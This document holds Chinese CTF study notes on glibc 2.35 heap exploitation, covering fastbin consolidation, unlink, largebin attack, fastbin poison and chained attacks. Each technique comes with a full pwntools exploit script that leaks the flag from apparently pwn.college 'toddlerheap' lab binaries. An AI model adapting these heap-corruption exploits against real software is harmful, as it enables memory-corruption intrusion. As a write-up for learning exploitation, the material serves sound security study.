1. fastbin consolidation
1.1 uaf + fastbin consolidation泄露flag
场景是:
1. 只能申请小于0x400的堆块,存放堆地址的空间只够16次
2. flag位于0x450的某个堆块中
3. 存在uaf漏洞
核心思路是:在fastbin中构造一个与top chunk相邻的chunk A,利用fastbin consolidation机制 + uaf,使read_flag申请的0x450的chunk B的起始地址与A相同,再通过A的悬空指针打印flag即可
from pwn import *
binary_path = "/challenge/toddlerheap_level1.0"
#binary_path = "./toddlerheap_level1.0"
p = process(binary_path)
def malloc(idx, size):
    """Send the ``malloc`` command and answer its two prompts.

    ``idx`` and ``size`` are sent as decimal text in reply to the
    ``Index: `` and ``Size: `` prompts respectively.
    """
    p.sendline(b"malloc")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
def free(idx):
    """Send the ``free`` command and answer the ``Index: `` prompt with ``idx``."""
    p.sendline(b"free")
    p.sendlineafter(b"Index: ", str(idx).encode())
def puts(idx):
    """Send the ``puts`` command and answer the ``Index: `` prompt with ``idx``.

    The program's reply is left unread on the tube for the caller.
    """
    p.sendline(b"puts")
    p.sendlineafter(b"Index: ", str(idx).encode())
# Allocate eight 0x70-byte requests into slots 0-7, then free all of them.
# NOTE(review): presumably the first seven frees fill the tcache so that
# slot 7 ends up in the fastbin next to the top chunk - confirm in gdb.
for i in range(8):
    malloc(i,0x70)
for i in range(8):
    free(i)
# gdb.attach(p)
# pause()
# Have the challenge load the flag, then print through the dangling slot-7
# pointer, which is expected to alias the flag buffer after consolidation.
p.sendline(b"read_flag")
puts(7)
p.interactive()
1.1.1 变种: uaf + fastbin consolidation + 防止consolidate的chunk
一般这种题目的核心思路是控制chunk的总和满足某个条件
from pwn import *
# Path of the target binary. The local copy is kept commented out (as in the
# other scripts of these notes) so that it does not silently override the
# challenge path; uncomment it when debugging offline.
binary_path = "/challenge/toddlerheap_level2.1"
#binary_path = "./toddlerheap_level2.1"
p = process(binary_path)
def malloc(idx, size):
    """Send ``malloc``, then reply to ``Index: `` with ``idx`` and ``Size: `` with ``size``."""
    slot = str(idx).encode()
    nbytes = str(size).encode()
    p.sendline(b"malloc")
    p.sendlineafter(b"Index: ", slot)
    p.sendlineafter(b"Size: ", nbytes)
def free(idx):
    """Send ``free``, then reply to the ``Index: `` prompt with ``idx``."""
    slot = str(idx).encode()
    p.sendline(b"free")
    p.sendlineafter(b"Index: ", slot)
def puts(idx):
    """Send ``puts``, then reply to the ``Index: `` prompt with ``idx``.

    Whatever the program prints afterwards is not consumed here.
    """
    slot = str(idx).encode()
    p.sendline(b"puts")
    p.sendlineafter(b"Index: ", slot)
def calloc(idx, size):
    """Send ``calloc``, then reply to ``Index: `` with ``idx`` and ``Size: `` with ``size``."""
    slot = str(idx).encode()
    nbytes = str(size).encode()
    p.sendline(b"calloc")
    p.sendlineafter(b"Index: ", slot)
    p.sendlineafter(b"Size: ", nbytes)
# Allocate eight 0x70-byte requests into slots 0-7, then free all of them.
for i in range(8):
    malloc(i,0x70)
for i in range(8):
    free(i)
# Large request meant to trigger fastbin consolidation; slot 8 is expected to
# start at the same address as the freed slot 7.
calloc(8,0x5b0)
malloc(9,0x10) # small guard so the neighbouring large chunks do not merge
# Second large chunk, freed before slot 8 below.
# NOTE(review): per the notes this is what satisfies the level's extra condition - confirm.
calloc(10,0x5b0)
malloc(11,0x10) # small guard so slot 10 does not merge with what follows
free(10)
free(8)
# gdb.attach(p)
# pause()
# Load the flag, then print it through the dangling slot-7 pointer.
p.sendline(b"read_flag")
puts(7)
p.interactive()
2. unlink
通过unlink能够解链,对某个地址的值进行改写
unlink的部分代码如下:
/* Excerpt of glibc's unlink_chunk as quoted in these notes; the rest of the
   function body is not reproduced here. */
static void unlink_chunk (mstate av, mchunkptr p) {
if (chunksize (p) != prev_size (next_chunk (p)))// check 1: p's size must equal the next chunk's prev_size
malloc_printerr ("corrupted size vs. prev_size");
mchunkptr fd = p->fd;
mchunkptr bk = p->bk;
if (__builtin_expect (fd->bk != p || bk->fd != p, 0))// check 2: both list neighbours must point back at p
malloc_printerr ("corrupted double-linked list");
/* The two writes below are the primitive the unlink attack relies on. */
fd->bk = bk;
bk->fd = fd;
2.1 unlink实现任意地址写
前提条件:一个已知的地址位置存放了一个指针:这个指针指向可以unlink的区域
绝大多数场景下,这个已知位置指global pointer,然后可以unlink的区域指能够堆溢出的chunk
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
#binary = "./toddlerheap_level5.1"
binary = "/challenge/toddlerheap_level5.1"
p = process(binary)
def malloc(idx, size):
    """Wait for the menu prompt, choose ``malloc`` and answer ``Index: `` / ``Size: ``.

    ``idx`` and ``size`` are sent as decimal text.
    """
    p.sendlineafter(b"[*] Function (malloc/read/free/puts/quit): ", b"malloc")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
def free(idx):
    """Wait for the menu prompt, choose ``free`` and answer ``Index: `` with ``idx``."""
    p.sendlineafter(b"[*] Function (malloc/read/free/puts/quit): ", b"free")
    p.sendlineafter(b"Index: ", str(idx).encode())
def puts(idx):
    """Wait for the menu prompt, choose ``puts`` and answer ``Index: `` with ``idx``.

    The printed data is left on the tube for the caller to read.
    """
    p.sendlineafter(b"[*] Function (malloc/read/free/puts/quit): ", b"puts")
    p.sendlineafter(b"Index: ", str(idx).encode())
def read(idx, size, content):
    """Choose ``read``, give the slot and byte count, then send the raw payload.

    ``content`` is sent as-is (no newline appended) right after the size
    line; no further prompt is awaited before sending it.
    """
    p.sendlineafter(b"[*] Function (malloc/read/free/puts/quit): ", b"read")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
    p.send(content)
def safe_read(idx, content):
    """Choose ``safe_read``, give the slot, then send the raw payload.

    The payload is sent only after the ``[*] read(0, allocations`` banner
    has been seen.

    NOTE(review): the menu prompt awaited here does not list ``safe_read``
    and the script below never calls this helper - confirm it is needed.
    """
    p.sendlineafter(b"[*] Function (malloc/read/free/puts/quit): ", b"safe_read")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendafter(b"[*] read(0, allocations", content)
# Parse the flag buffer address from the startup banner
# ("Reading the flag into <hex>.").
p.recvuntil(b"Reading the flag into ")
flag_addr = int(p.recvuntil(b".\n").strip(b".\n"),16)
log.success(f"flag_addr: {hex(flag_addr)}")
# Address of the global slot holding the chunk-0 pointer.
# NOTE(review): hard-coded for this binary - verify against the target.
chunk0_ptr = 0x404140
malloc(0,0x420)
malloc(1,0x420)
# gdb.attach(p)
# pause()
# Build a fake free chunk inside chunk 0: prev_size 0, size 0x420, and fd/bk
# chosen so that fd->bk and bk->fd both resolve to chunk0_ptr.
payload = p64(0)+p64(0x420)+p64(chunk0_ptr-0x18)+p64(chunk0_ptr-0x10)+b"\x00"*(0x420-0x20)
# Overflow into chunk 1's header: prev_size 0x420 and size 0x430 with the
# low (PREV_INUSE) bit clear.
payload += p64(0x420)+p64(0x430) # chunk1 prev_size, size
read(0,len(payload),payload)
free(1) # backward consolidation triggers unlink of the fake chunk
# now chunk0_ptr holds &chunk0_ptr - 0x18
# writing through slot 0 therefore reaches chunk0_ptr itself at offset 0x18;
# overwrite it with flag_addr
payload = b"\x00"*0x18 + p64(flag_addr)
read(0,0x20,payload)
# Slot 0 now points at the flag buffer.
puts(0)
p.interactive()
3. largebin attack
glibc2.35的情况下,关于large bin的检查有如下两个:(前情提要:large bin的fd、bk指向相同size的其他chunk,而fd_nextsize、bk_nextsize指向其他放在这个bin中的不同大小的chunk)
Check 1 :
> if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
> malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
Check 2 :
> if (bck->fd != fwd)
> malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
实际代码如下:
victim_index = largebin_index (size);
bck = bin_at (av, victim_index);//实际返回的总是一对哨兵的 fd 字段地址 —— 也就是该 bin 的头结点
fwd = bck->fd;
/* maintain large bins in sorted order */
// 维护largebin的顺序
if (fwd != bck)
{
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE;
/* if smaller than smallest, bypass loop below */
assert(chunk_main_arena(bck->bk));
if ((unsigned long)(size) < (unsigned long)chunksize_nomask(bck->bk))
{
fwd = bck;
bck = bck->bk;
victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; // 从这里进行任意写利用!
}
else
{
assert(chunk_main_arena(fwd));
while ((unsigned long)size < chunksize_nomask(fwd))
{
fwd = fwd->fd_nextsize;
assert(chunk_main_arena(fwd));
}
if ((unsigned long)size == (unsigned long)chunksize_nomask(fwd))
/* Always insert in the second position. */
fwd = fwd->fd;
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
if (__glibc_unlikely(fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr("malloc(): largebin double linked list corrupted (nextsize)");
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
if (bck->fd != fwd)
malloc_printerr("malloc(): largebin double linked list corrupted (bk)");
}
}
else
victim->fd_nextsize = victim->bk_nextsize = victim;
}
// 添加到bin中,链表添加成员
mark_bin(av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
现在利用前提如下:
1. largebin chunk的bk_nextsize可以被修改
2. 即将从unsorted bin整理进large bin的chunk,其size必须小于该large bin中现有的最小chunk(对应上面代码中 size < chunksize_nomask(bck->bk) 的分支)
exp如下:
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
#binary = "./toddlerheap_level4.1"
binary = "/challenge/toddlerheap_level4.1"
p = process(binary)
def malloc(idx, size):
    """Wait for the menu prompt, choose ``malloc`` and answer ``Index: `` / ``Size: ``."""
    menu = b"[*] Function (malloc/safe_read/free/puts/send_flag/quit): "
    p.sendlineafter(menu, b"malloc")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
def free(idx):
    """Wait for the menu prompt, choose ``free`` and answer ``Index: `` with ``idx``."""
    menu = b"[*] Function (malloc/safe_read/free/puts/send_flag/quit): "
    p.sendlineafter(menu, b"free")
    p.sendlineafter(b"Index: ", str(idx).encode())
def puts(idx):
    """Wait for the menu prompt, choose ``puts`` and answer ``Index: `` with ``idx``.

    The printed data is left on the tube for the caller to read.
    """
    menu = b"[*] Function (malloc/safe_read/free/puts/send_flag/quit): "
    p.sendlineafter(menu, b"puts")
    p.sendlineafter(b"Index: ", str(idx).encode())
def safe_read(idx, content):
    """Choose ``safe_read``, give the slot, then send the raw payload.

    ``content`` is sent as-is immediately after the index line; no further
    prompt is awaited first.
    """
    menu = b"[*] Function (malloc/safe_read/free/puts/send_flag/quit): "
    p.sendlineafter(menu, b"safe_read")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.send(content)
# Three large chunks of decreasing size (slots 0, 2, 4), each followed by a
# guard allocation so that freed neighbours do not merge.
malloc(0,0xbd8)
malloc(1,0xbb8) # guard
malloc(2,0xbc8)
malloc(3,0xbb8) # guard
malloc(4,0xbb8)
malloc(5,0xbb8) # guard
free(0)
# Leak a libc pointer through the dangling slot 0.
# NOTE(review): the variable name suggests this is main_arena+0x60 - confirm.
puts(0)
p.recvuntil(b"Data: ")
main_arena_offset_0x60 = u64(p.recvline().strip(b"\n").ljust(8,b"\x00"))
log.success(f"address: {hex(main_arena_offset_0x60)}")
malloc(6,0xbe8) # larger request: sorts #0 into the largebin
free(2)
malloc(7,0xbe8) # larger request: sorts #2 into the largebin
# Leak a heap pointer: the first qword of #0 is read again after #2 joined the bin.
puts(0)
p.recvuntil(b"Data: ")
heap_addr = u64(p.recvline().strip(b"\n").ljust(8,b"\x00"))
log.success(f"heap address: {hex(heap_addr)}")
# gdb.attach(p)
# pause()
# largebin attack
# Address to be overwritten with a heap pointer.
# NOTE(review): hard-coded for this binary - verify against the target.
target = 0x4041C0
# Four qwords written over #0's user data, presumably fd, bk, fd_nextsize and
# bk_nextsize. The last one is target-0x20 so that bk_nextsize->fd_nextsize
# (offset 0x20) lands on target.
payload = p64(heap_addr)+p64(main_arena_offset_0x60)+p64(heap_addr)+p64(target-0x20)
safe_read(0,payload)
# pause()
# Free the smallest chunk, then request a larger one so it is sorted into the
# largebin through the "smaller than smallest" branch, performing the write.
free(4)
#pause()
malloc(8,0xbe8)
p.sendline(b"send_flag")
p.interactive()
4. fastbin attack
4.1 fastbin poison
fastbin和tcachebin类似,而且它的poison操作非常容易实现:
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
#binary = "./toddlerheap_level6.1"
binary = "/challenge/toddlerheap_level6.1"
p = process(binary)
def calloc(idx, size):
    """Wait for the menu prompt, choose ``calloc`` and answer ``Index: `` / ``Size: ``."""
    menu = b"[*] Function (calloc/read_to_global/safer_read/free/puts/quit): "
    p.sendlineafter(menu, b"calloc")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
def malloc(idx, size):
    """Wait for the menu prompt, choose ``malloc`` and answer ``Index: `` / ``Size: ``.

    NOTE(review): the menu prompt awaited here does not list ``malloc`` and
    the script below never calls this helper - confirm it is needed.
    """
    menu = b"[*] Function (calloc/read_to_global/safer_read/free/puts/quit): "
    p.sendlineafter(menu, b"malloc")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
def free(idx):
    """Wait for the menu prompt, choose ``free`` and answer ``Index: `` with ``idx``."""
    menu = b"[*] Function (calloc/read_to_global/safer_read/free/puts/quit): "
    p.sendlineafter(menu, b"free")
    p.sendlineafter(b"Index: ", str(idx).encode())
def puts(idx):
    """Wait for the menu prompt, choose ``puts`` and answer ``Index: `` with ``idx``.

    The printed data is left on the tube for the caller to read.
    """
    menu = b"[*] Function (calloc/read_to_global/safer_read/free/puts/quit): "
    p.sendlineafter(menu, b"puts")
    p.sendlineafter(b"Index: ", str(idx).encode())
def read(idx, size, content):
    """Choose ``read``, give the slot and byte count, then send the raw payload.

    NOTE(review): the menu prompt awaited here does not list ``read`` and
    the script below never calls this helper - confirm it is needed.
    """
    menu = b"[*] Function (calloc/read_to_global/safer_read/free/puts/quit): "
    p.sendlineafter(menu, b"read")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
    # The payload goes out right away; no further prompt is awaited.
    p.send(content)
def safe_read(idx, content):
    """Choose the ``safer_read`` menu entry, give the slot, then send the raw payload.

    Note that the command sent on the wire is ``safer_read`` even though the
    helper is named ``safe_read``. ``content`` is sent as-is immediately
    after the index line.
    """
    menu = b"[*] Function (calloc/read_to_global/safer_read/free/puts/quit): "
    p.sendlineafter(menu, b"safer_read")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.send(content)
def read_to_global(size, content):
    """Choose ``read_to_global``, answer ``read_size: `` with ``size``, then send the payload.

    ``content`` is sent as-is (no newline appended) right after the size line.
    """
    menu = b"[*] Function (calloc/read_to_global/safer_read/free/puts/quit): "
    p.sendlineafter(menu, b"read_to_global")
    p.sendlineafter(b"read_size: ", str(size).encode())
    p.send(content)
# Parse the flag buffer address from the startup banner
# ("Reading the flag into <hex>.").
p.recvuntil(b"Reading the flag into ")
flag_addr = int(p.recvuntil(b".\n").strip(b".\n"),16)
log.success(f"flag_addr: {hex(flag_addr)}")
# fill tcache: allocate and immediately free seven 0x18-byte requests.
# NOTE(review): the original indentation was lost; both calls are assumed to
# be inside the loop, otherwise only slot 6 would ever be freed.
for i in range(7):
    calloc(i,0x18)
    free(i)
# Put two chunks into the fastbin (the tcache for this size is now full).
calloc(0,0x18)
calloc(1,0x18)
free(0)
free(1)
#free(0) # would give the classic double free 0->1->0; not needed with the UAF write
# get heap addr: slot 1's fd is the safe-linked pointer to chunk 0
puts(1)
p.recvuntil(b"Data: ")
encrypt_info = u64(p.recvline().strip(b"\n").ljust(8,b"\x00"))
log.success(f"encrypt addr: {hex(encrypt_info)}")
# Undo safe-linking 12 bits at a time from the top: each 12-bit group of the
# mangled value is the plain group XORed with the plain group above it.
# This assumes the chunk and the pointer stored in it share the same page.
one = (encrypt_info>>36)&0xfff
two = ((encrypt_info>>24)&0xfff)^one
three = ((encrypt_info>>12)&0xfff)^two
four = ((encrypt_info)&0xfff)^three
heap_addr = (one<<36)|(two<<24)|(three<<12)|four
log.success(f"heap_addr: {hex(heap_addr)}")
# fastbin attack: re-mangle the target (0x38 below the flag buffer) and write
# it into the freed slot 1's fd
payload = (flag_addr-0x38) ^ (heap_addr>>12)
safe_read(1,p64(payload))
## change size field: place a fake chunk header (prev_size 0, size 0x20, fd 0)
## at the end of the global buffer so the fake chunk passes the fastbin size check
payload = b"a"*(0x158-0x20-0x18)+p64(0)+p64(0x20)+p64(0)
read_to_global(0x158-0x20,payload)
# gdb.attach(p)
# pause()
# First calloc returns the real chunk, the second returns the fake chunk.
calloc(2,0x18)
calloc(3,0x18)
# Refill the global buffer with non-zero bytes so the later puts(3) is not cut
# short by NUL bytes before it reaches the flag.
# NOTE(review): inferred from the offsets above - confirm the layout in gdb.
payload = b"a"*0x158
read_to_global(0x158,payload)
puts(3)
p.interactive()
4.2 fastbin double free -> tcachebin
使用场景:
1. 只使用malloc分配
2. 只有double free漏洞
利用思路:
1. 申请9个chunk,标号从0开始
2. 释放[0,7)的chunk
3. 释放chunk 7,再释放chunk 8, 再释放chunk 7, 这样fastbin中将形成7->8->7的链条
4. 申请7个chunk,清空tcachebin
5. 继续申请chunk,触发fastbin放入tcachebin的逻辑,此时7会被返回,tcachebin中留存8->7->8的链
6. 修改7的内容,使tcachebin链变为8->7->x
7. 申请8,申请7,申请x,即可完成任意地址写原语
5. 综合利用
了解、掌握了各个攻击的单点攻击手法,还是不够的,现在的ctf(包括现网环境),往往单点的攻击手法已经无法突破已有的防御手段了(或只达成了部分目的),所以,综合利用多个漏洞/攻击手法是现在的解决方案。
5.1 案例一: fastbin attack + unlink
上文提到:unlink的使用场景通常是一个已知的地址中存放指向chunk的指针,且这个chunk是可以被unlink的
结合fastbin攻击的话,我们可以先在fastbin中伪造一个假chunk,利用fastbin poison获得该chunk,继而修改下一个chunk的大小,实现unlink。
unlink时,并不关注上一个chunk的大小,另外要注意,我们只需要consolidate backward,不需要forward
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
#binary = "./toddlerheap_level7.1"
binary = "/challenge/toddlerheap_level7.1"
p = process(binary)
def calloc(idx, size):
    """Wait for the menu prompt, choose ``calloc`` and answer ``Index: `` / ``Size: ``."""
    menu = b"[*] Function (calloc/safer_read/free/puts/quit): "
    p.sendlineafter(menu, b"calloc")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
def malloc(idx, size):
    """Wait for the menu prompt, choose ``malloc`` and answer ``Index: `` / ``Size: ``.

    NOTE(review): the menu prompt awaited here does not list ``malloc`` and
    the script below never calls this helper - confirm it is needed.
    """
    menu = b"[*] Function (calloc/safer_read/free/puts/quit): "
    p.sendlineafter(menu, b"malloc")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
def free(idx):
    """Wait for the menu prompt, choose ``free`` and answer ``Index: `` with ``idx``."""
    menu = b"[*] Function (calloc/safer_read/free/puts/quit): "
    p.sendlineafter(menu, b"free")
    p.sendlineafter(b"Index: ", str(idx).encode())
def puts(idx):
    """Wait for the menu prompt, choose ``puts`` and answer ``Index: `` with ``idx``.

    The printed data is left on the tube for the caller to read.
    """
    menu = b"[*] Function (calloc/safer_read/free/puts/quit): "
    p.sendlineafter(menu, b"puts")
    p.sendlineafter(b"Index: ", str(idx).encode())
def read(idx, size, content):
    """Choose ``read``, give the slot and byte count, then send the raw payload.

    NOTE(review): the menu prompt awaited here does not list ``read`` and
    the script below never calls this helper - confirm it is needed.
    """
    menu = b"[*] Function (calloc/safer_read/free/puts/quit): "
    p.sendlineafter(menu, b"read")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
    # The payload goes out right away; no further prompt is awaited.
    p.send(content)
def safe_read(idx, content):
    """Choose the ``safer_read`` menu entry, give the slot, then send the raw payload.

    The command sent on the wire is ``safer_read`` even though the helper is
    named ``safe_read``. ``content`` is sent as-is immediately after the
    index line.
    """
    menu = b"[*] Function (calloc/safer_read/free/puts/quit): "
    p.sendlineafter(menu, b"safer_read")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.send(content)
def read_to_global(size, content):
    """Choose ``read_to_global``, answer ``read_size: `` with ``size``, then send the payload.

    NOTE(review): the menu prompt awaited here does not list
    ``read_to_global`` and the script below never calls this helper -
    confirm it is needed.
    """
    menu = b"[*] Function (calloc/safer_read/free/puts/quit): "
    p.sendlineafter(menu, b"read_to_global")
    p.sendlineafter(b"read_size: ", str(size).encode())
    p.send(content)
# Parse the flag buffer address from the startup banner
# ("Reading the flag into <hex>.").
p.recvuntil(b"Reading the flag into ")
flag_addr = int(p.recvuntil(b".\n").strip(b".\n"),16)
log.success(f"flag_addr: {hex(flag_addr)}")
# step 1: fill tcachebin by allocating and immediately freeing seven chunks.
# NOTE(review): the original indentation was lost; both calls are assumed to
# be inside the loop, otherwise only slot 6 would ever be freed.
for i in range(7):
    calloc(i,0x30)
    free(i)
# Three adjacent working chunks (slots 0, 1, 2).
calloc(0,0x30)
calloc(1,0x30)
calloc(2,0x30)
# Sixteen padding chunks (all stored in slot 3) so that the fake size 0x440
# written into chunk 1 later still ends on a real chunk boundary.
# NOTE(review): the original indentation was lost; calloc(4, ...) is assumed
# to sit outside the loop as a single trailing guard chunk - confirm.
for i in range(16):
    calloc(3,0x30)
calloc(4,0x30)
free(1)
free(0) # fastbin: 0 -> 1
# step 2: get heap_addr from slot 0's safe-linked fd (which points at chunk 1)
puts(0)
p.recvuntil(b"Data: ")
heap_addr = u64(p.recvline().strip(b"\n").ljust(8,b"\x00"))
# Undo safe-linking 12 bits at a time from the top; assumes chunk 0 and
# chunk 1 share the same page.
one = (heap_addr>>36)&0xfff
two = ((heap_addr>>24)&0xfff)^one
three = ((heap_addr>>12)&0xfff)^two
four = ((heap_addr)&0xfff)^three
heap_addr = (one<<36)|(two<<24)|(three<<12)|four
log.success(f"heap_addr: {hex(heap_addr)}")
# step 3: create a fake chunk inside chunk 0's user data
calloc(0,0x30) # get 0 again
payload = p64(0)+p64(0x40) +p64(heap_addr>>12)# fake chunk's prev_size and size, plus a mangled NULL fd
safe_read(0,payload)
payload = p64((heap_addr>>12)^(heap_addr-0x30)) # fastbin poison: point freed chunk 1's fd at the fake chunk
safe_read(1,payload)
calloc(1,0x30)
calloc(5,0x30) # slot 5 is the fake chunk (slot 0's data + 0x10); it overlaps chunk 1's header
# step 4: modify chunk 0 and chunk 5 to set up the unlink
payload = p64(0)+p64(0x31)
safe_read(0,payload)
# Address of the global slot that stores pointer 0.
# NOTE(review): derived from flag_addr with binary-specific offsets - verify.
heap_struct_addr = flag_addr-(0x4218-0x4040) +0x100 # &0
payload = p64(heap_struct_addr-0x18)+p64(heap_struct_addr-0x10)+p64(0)+p64(0)+p64(0x30)+p64(0x440) # fake fd/bk, then chunk1 prev_size & size
safe_read(5,payload)
free(1) # unlink via backward consolidation; make sure we won't consolidate forward
# step 5: make slot 0 point at flag_addr
payload = b"\x00"*0x18+p64(flag_addr)
safe_read(0,payload)
puts(0)
# gdb.attach(p)
# pause()
p.interactive()
5.2 案例二:tcache泄露地址 + off-by-null + unlink
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
#binary = "./toddlerheap_level8.1"
binary = "/challenge/toddlerheap_level8.1"
p = process(binary)
def malloc(idx, size):
    """Send ``malloc``, then reply to ``Index: `` with ``idx`` and ``Size: `` with ``size``."""
    p.sendline(b"malloc")
    for prompt, value in ((b"Index: ", idx), (b"Size: ", size)):
        p.sendlineafter(prompt, str(value).encode())
def free(idx):
    """Send ``free``, then reply to the ``Index: `` prompt with ``idx``."""
    p.sendline(b"free")
    p.sendlineafter(b"Index: ", str(idx).encode())
def puts(idx):
    """Send ``puts``, then reply to the ``Index: `` prompt with ``idx``.

    The printed data is left on the tube for the caller to read.
    """
    p.sendline(b"puts")
    p.sendlineafter(b"Index: ", str(idx).encode())
def read_copy(idx, content):
    """Send ``read_copy``, give the slot, then send the raw payload.

    ``content`` is sent as-is (no newline appended) immediately after the
    index line; no further prompt is awaited first.
    """
    p.sendline(b"read_copy")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.send(content)
def read_flag():
    """Send the ``read_flag`` command; nothing is read back here."""
    command = b"read_flag"
    p.sendline(command)
# step 1: leak heap addr:
# Free a small chunk and take it back; its first qword still holds the
# safe-linked fd. NOTE(review): presumably this was the only tcache entry, so
# the stored value is (chunk address >> 12) - confirm.
malloc(0,0x20)
free(0)
malloc(0,0x20)
puts(0)
p.recvuntil(b"Data: ")
heap_base = u64(p.recvline().strip(b"\n").ljust(8,b"\x00"))<<12
log.success(f"heap_base: {hex(heap_base)}")
# step 2: leak the libc addr:
# Free a large chunk and take it back so that a stale bin pointer can be read.
malloc(1,0x500)
malloc(2,0x10) # guard
free(1)
malloc(1,0x500)
puts(1)
p.recvuntil(b"Data: ")
# NOTE(review): 0x219ce0 is a libc-specific offset - verify for the target libc.
libc_base = u64(p.recvline().strip(b"\n").ljust(8,b"\x00"))-0x219ce0
log.success(f"libc_base: {hex(libc_base)}")
# step 3: use the off-by-null overflow to create fake chunks
malloc(3,0xb8) # chunk size 0xc0
malloc(4,0x5AF) # chunk size 0x5c0
malloc(5,0x20) # guard
# gdb.attach(p)
# pause()
# Slot 3 payload: fd/bk for the unlink check, a third heap pointer, zero
# padding and finally 0xc0, which becomes chunk 4's prev_size.
# NOTE(review): presumably the terminating NUL then clears PREV_INUSE in
# chunk 4's size field; heap_base+0x810 / +0x7f0 depend on the heap layout.
payload = p64(heap_base+0x810-0x18)+p64(heap_base+0x810-0x10)+p64(heap_base+0x7f0)+b"\x00"*(0xb0-0x18) + p64(0xc0)
read_copy(3,payload)
payload = b"\x00"*0x4f0+p64(0x500)+p64(0x21) # create a fake chunk, avoid consolidating
payload += b"\x00"*0x10+ p64(0)+p64(0xc1-0x20) # create a fake chunk, avoid consolidating
read_copy(4,payload)
# step 4: malloc a chunk to get flag
free(4) # backward consolidation merges chunk 4 into chunk 3's region
read_flag()
# Slot 3 still points into the merged region, where the flag is expected to land.
puts(3)
p.interactive()
6. 写在最后
写poc出现bug,或者遇到一些难题,或者你想要看看当前的利用方式,可以参考如下几个链接:
https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c
https://github.com/shellphish/how2heap/tree/master/glibc_2.35